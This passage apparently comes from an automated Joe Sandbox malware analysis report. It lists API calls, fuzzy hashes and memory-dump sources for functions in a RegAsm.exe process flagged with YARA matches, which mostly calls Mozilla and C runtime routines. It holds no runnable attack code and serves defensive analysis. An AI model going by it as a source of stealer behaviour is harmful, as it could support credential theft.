                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FE60: lstrcpy.KERNEL32(00000000), ref: 0040FE88
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrcpy$AllocLocallstrlenmemcmpmemset
                                                                                                                                                                                                                                                                                                  • String ID: @$v10
                                                                                                                                                                                                                                                                                                  • API String ID: 1400469952-24753345
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • moz_xmalloc.MOZGLUE(-00000002,?,6C80152B,?,?,?,?,6C801248,?), ref: 6C80159C
                                                                                                                                                                                                                                                                                                  • memcpy.VCRUNTIME140(00000023,?,?,?,?,6C80152B,?,?,?,?,6C801248,?), ref: 6C8015BC
                                                                                                                                                                                                                                                                                                  • moz_xmalloc.MOZGLUE(-00000001,?,6C80152B,?,?,?,?,6C801248,?), ref: 6C8015E7
                                                                                                                                                                                                                                                                                                  • free.MOZGLUE(?,?,?,?,?,?,6C80152B,?,?,?,?,6C801248,?), ref: 6C801606
                                                                                                                                                                                                                                                                                                  • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,6C80152B,?,?,?,?,6C801248,?), ref: 6C801637
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
• Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: moz_xmalloc$_invalid_parameter_noinfo_noreturnfreememcpy
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 733145618-0
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • moz_xmalloc.MOZGLUE(00000000,?,00000000,?,?,6C86E330,?,6C81C059), ref: 6C85AD9D
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C80CA10: malloc.MOZGLUE(?), ref: 6C80CA26
                                                                                                                                                                                                                                                                                                  • memset.VCRUNTIME140(00000000,00000000,00000000,00000000,?,?,6C86E330,?,6C81C059), ref: 6C85ADAC
                                                                                                                                                                                                                                                                                                  • free.MOZGLUE(?,?,?,?,00000000,?,?,6C86E330,?,6C81C059), ref: 6C85AE01
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00000000,?,?,6C86E330,?,6C81C059), ref: 6C85AE1D
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00000000,00000000,00000000,?,?,?,00000000,?,?,6C86E330,?,6C81C059), ref: 6C85AE3D
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
• Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorLast$freemallocmemsetmoz_xmalloc
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 3161513745-0
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • ?_Ipfx@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE_N_N@Z.MSVCP140(00000001,00000000,6C86DCA0,?,?,?,6C82E8B5,00000000), ref: 6C855F1F
                                                                                                                                                                                                                                                                                                  • ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(?,6C82E8B5,00000000), ref: 6C855F4B
                                                                                                                                                                                                                                                                                                  • ?snextc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(00000000,?,6C82E8B5,00000000), ref: 6C855F7B
                                                                                                                                                                                                                                                                                                  • ?clear@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(6E65475B,00000000,?,6C82E8B5,00000000), ref: 6C855F9F
                                                                                                                                                                                                                                                                                                  • ?sbumpc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(?,6C82E8B5,00000000), ref: 6C855FD6
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
• Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: D@std@@@std@@U?$char_traits@$?clear@?$basic_ios@?sbumpc@?$basic_streambuf@?sgetc@?$basic_streambuf@?snextc@?$basic_streambuf@Ipfx@?$basic_istream@
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 1389714915-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 8b3bcb0ce2c38035e391852d2455b188f4ab2f6c8789b12a16c70f6e8c75d7ee
                                                                                                                                                                                                                                                                                                  • Instruction ID: 221ec7633f4376961435195cf10225515c83c942b33cfddbc4c9032a0eb196a4
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8b3bcb0ce2c38035e391852d2455b188f4ab2f6c8789b12a16c70f6e8c75d7ee
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7E314E343006008FD761CF29C998E2ABBF6FF89319BA44968F55687B95C772EC51CB90
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 6C7FB532
                                                                                                                                                                                                                                                                                                  • moz_xmalloc.MOZGLUE(?), ref: 6C7FB55B
                                                                                                                                                                                                                                                                                                  • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C7FB56B
                                                                                                                                                                                                                                                                                                  • wcsncpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?), ref: 6C7FB57E
                                                                                                                                                                                                                                                                                                  • free.MOZGLUE(00000000), ref: 6C7FB58F
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: HandleModulefreememsetmoz_xmallocwcsncpy_s
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 4244350000-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 05150207e4e53adcf7e57740a8077d62bd5afdcddbe953fe50a71f6ab74c4e8b
                                                                                                                                                                                                                                                                                                  • Instruction ID: 120b9d5d34843048136ce6891e50e42a69f8bfbab7b37ab80c7f4e34247fc54a
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 05150207e4e53adcf7e57740a8077d62bd5afdcddbe953fe50a71f6ab74c4e8b
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4F21F871A04205DBDB018F69CD84B6EBBB9FF42308F284039E824DB341E775E912C7A1
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • MozDescribeCodeAddress.MOZGLUE(?,?), ref: 6C856E78
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C856A10: InitializeCriticalSection.KERNEL32(6C87F618), ref: 6C856A68
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C856A10: GetCurrentProcess.KERNEL32 ref: 6C856A7D
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C856A10: GetCurrentProcess.KERNEL32 ref: 6C856AA1
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C856A10: EnterCriticalSection.KERNEL32(6C87F618), ref: 6C856AAE
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C856A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6C856AE1
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C856A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6C856B15
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C856A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100,?,?), ref: 6C856B65
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C856A10: LeaveCriticalSection.KERNEL32(6C87F618,?,?), ref: 6C856B83
                                                                                                                                                                                                                                                                                                  • MozFormatCodeAddress.MOZGLUE ref: 6C856EC1
                                                                                                                                                                                                                                                                                                  • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6C856EE1
                                                                                                                                                                                                                                                                                                  • _fileno.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6C856EED
                                                                                                                                                                                                                                                                                                  • _write.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000400), ref: 6C856EFF
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CriticalSectionstrncpy$AddressCodeCurrentProcess$DescribeEnterFormatInitializeLeave_fileno_writefflush
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 4058739482-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 6222d7995ca994d9392da38c202ecb3671778bb902259a8746ad288fffeb84cb
                                                                                                                                                                                                                                                                                                  • Instruction ID: e7767227cd3990553cf429b807506e6fa5a328f09c63ea276b9bfd51461c3ec1
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6222d7995ca994d9392da38c202ecb3671778bb902259a8746ad288fffeb84cb
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4321B271A042198FCB10CF69D9886AE77F5EF84308F044439E80997340EB709A58CFA2
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32 ref: 6C8576F2
                                                                                                                                                                                                                                                                                                  • moz_xmalloc.MOZGLUE(00000001), ref: 6C857705
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C80CA10: malloc.MOZGLUE(?), ref: 6C80CA26
                                                                                                                                                                                                                                                                                                  • memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C857717
                                                                                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,6C85778F,00000000,00000000,00000000,00000000), ref: 6C857731
                                                                                                                                                                                                                                                                                                  • free.MOZGLUE(00000000), ref: 6C857760
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ByteCharMultiWide$freemallocmemsetmoz_xmalloc
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 2538299546-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: cbc143706aa0c344bc578d5ab31869c5e4789f67b3d6490cfef1c1831890727c
                                                                                                                                                                                                                                                                                                  • Instruction ID: ce9d862a91342eb4b9b1639473e3c9e32c67f2212f02dda886d08962f86a6272
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cbc143706aa0c344bc578d5ab31869c5e4789f67b3d6490cfef1c1831890727c
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1211B6B59043156FD720AFBA9D44B6B7EE8EF46354F048839F848A7300E7709850C7E2
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • VirtualFree.KERNEL32(?,00000000,00008000,00003000,00003000,?,6C7F3DEF), ref: 6C830D71
                                                                                                                                                                                                                                                                                                  • VirtualAlloc.KERNEL32(?,08000000,00003000,00000004,?,6C7F3DEF), ref: 6C830D84
                                                                                                                                                                                                                                                                                                  • VirtualFree.KERNEL32(00000000,00000000,00008000,?,6C7F3DEF), ref: 6C830DAF
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Virtual$Free$Alloc
                                                                                                                                                                                                                                                                                                  • String ID: : (malloc) Error in VirtualFree()$<jemalloc>
                                                                                                                                                                                                                                                                                                  • API String ID: 1852963964-2186867486
                                                                                                                                                                                                                                                                                                  • Opcode ID: b8735ede4f8acd2729d98a0d784bdfd5922a2d181e3b18385615ec28fe1e5258
                                                                                                                                                                                                                                                                                                  • Instruction ID: df204fdf33cdba02465e44940eff49fa8fe2387866d13049a80aaccc2f54b07b
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b8735ede4f8acd2729d98a0d784bdfd5922a2d181e3b18385615ec28fe1e5258
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E4F0E03138027823D53111E55E09B6E659E67C1F15F707935F20CDADC0FB50E40486F5
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • moz_xmalloc.MOZGLUE(0000002C,?,?,?,?,6C8475C4,?), ref: 6C84762B
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C80CA10: malloc.MOZGLUE(?), ref: 6C80CA26
                                                                                                                                                                                                                                                                                                  • InitializeConditionVariable.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,6C8474D7,6C8515FC,?,?,?), ref: 6C847644
                                                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C84765A
                                                                                                                                                                                                                                                                                                  • AcquireSRWLockExclusive.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,6C8474D7,6C8515FC,?,?,?), ref: 6C847663
                                                                                                                                                                                                                                                                                                  • ReleaseSRWLockExclusive.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,6C8474D7,6C8515FC,?,?,?), ref: 6C847677
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ExclusiveLock$AcquireConditionCurrentInitializeReleaseThreadVariablemallocmoz_xmalloc
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 418114769-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: f802f7d54524f8f9cef831eef47b94728714b94fc2d8fc46ec64c7d829a7c11e
                                                                                                                                                                                                                                                                                                  • Instruction ID: 7076f92d013417a23305c5112084f05132a6ffa0fe67c5bcf722991c30e4fdeb
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f802f7d54524f8f9cef831eef47b94728714b94fc2d8fc46ec64c7d829a7c11e
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 77F0AF72E10755ABE7018F21C88867AB779FFEA259F114326F90452602E7B0A5D0CBE1
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • __getptd.LIBCMT ref: 0041B46D
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041B644: __getptd_noexit.LIBCMT ref: 0041B647
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041B644: __amsg_exit.LIBCMT ref: 0041B654
                                                                                                                                                                                                                                                                                                  • __getptd.LIBCMT ref: 0041B484
                                                                                                                                                                                                                                                                                                  • __amsg_exit.LIBCMT ref: 0041B492
                                                                                                                                                                                                                                                                                                  • __lock.LIBCMT ref: 0041B4A2
                                                                                                                                                                                                                                                                                                  • __updatetlocinfoEx_nolock.LIBCMT ref: 0041B4B6
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 938513278-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 0f6afaa9064bb234d9d04682b667ea74c0d2944bc8bfe346e0a6a773a651760d
                                                                                                                                                                                                                                                                                                  • Instruction ID: b0c707a50401f718638692aa78b59e6a41ed05d44f506c8c98db66485addeac5
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0f6afaa9064bb234d9d04682b667ea74c0d2944bc8bfe346e0a6a773a651760d
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 92F06231A417109AD721BB769807BCD3290EF04729F61811FF419572C3CB6C59C18ADF
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C82CBE8: GetCurrentProcess.KERNEL32(?,6C7F31A7), ref: 6C82CBF1
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C82CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C7F31A7), ref: 6C82CBFA
                                                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(6C87E784,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C82D1C5), ref: 6C81D4F2
                                                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(6C87E784,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C82D1C5), ref: 6C81D50B
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C7FCFE0: EnterCriticalSection.KERNEL32(6C87E784), ref: 6C7FCFF6
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C7FCFE0: LeaveCriticalSection.KERNEL32(6C87E784), ref: 6C7FD026
                                                                                                                                                                                                                                                                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C82D1C5), ref: 6C81D52E
                                                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(6C87E7DC), ref: 6C81D690
                                                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(6C87E784,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C82D1C5), ref: 6C81D751
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CriticalSection$EnterLeave$Process$CountCurrentInitializeSpinTerminate
                                                                                                                                                                                                                                                                                                  • String ID: MOZ_CRASH()
                                                                                                                                                                                                                                                                                                  • API String ID: 3805649505-2608361144
                                                                                                                                                                                                                                                                                                  • Opcode ID: e1206dc03a5a6169008dc6e7fb783f1fff7d57fcdb5b4d6e69ddaca2a5139944
                                                                                                                                                                                                                                                                                                  • Instruction ID: 47e816ca9e803762a5f3e404620943a745771fc68650ae1873cb260d32701b67
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e1206dc03a5a6169008dc6e7fb783f1fff7d57fcdb5b4d6e69ddaca2a5139944
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F751B171A087128FD735CF28C29476AB7E1EB89308F544E2ED559C7F45E774A840CBA1
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
